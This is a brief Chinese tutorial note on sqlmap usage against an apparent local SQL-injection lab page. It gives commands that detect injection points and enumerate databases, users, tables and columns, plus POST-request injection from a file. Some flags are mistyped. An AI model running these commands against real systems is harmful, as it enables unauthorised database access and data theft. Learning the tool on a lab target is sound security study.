2022-06-14 sqlmap的使用

sqlmap主要的语法

---

sqlmap -u http://192.168.1.113/sql/less-1/index.php?id=1 --batch

--batch  在执行中省去进行确认的过程

此语句用于测试目标网站是否存在注入点，如下图中存在四个注入点，其中payload就是sqlmap使用的测试语句。

sqlmap -u http://192.168.1.113/sql/less-1/index.php?id=1 -dbs

作用：查看此页面数据库后台存在的数据库名。

sqlmap -u http://192.168.1.113/sql/less-1/index.php?id=1 --current-db --current-use

作用：查看当前网页使用的数据库名称以及使用的用户名称和使用的服务器。

此语句图中显示还有mysql版本，路径等信息

sqlmap -u http://192.168.1.113/sql/less-1/index.php?id=1 -tables -D security

作用：查看security数据库中存在的表。

sqlmap -u http://192.168.1.113/sql/less-1/index.php?id=1 --columns -T users -D security

作用：查看security数据库中users表存在的列。

post注入

sqlmap -r post.txt

从文件中读取http的post请求包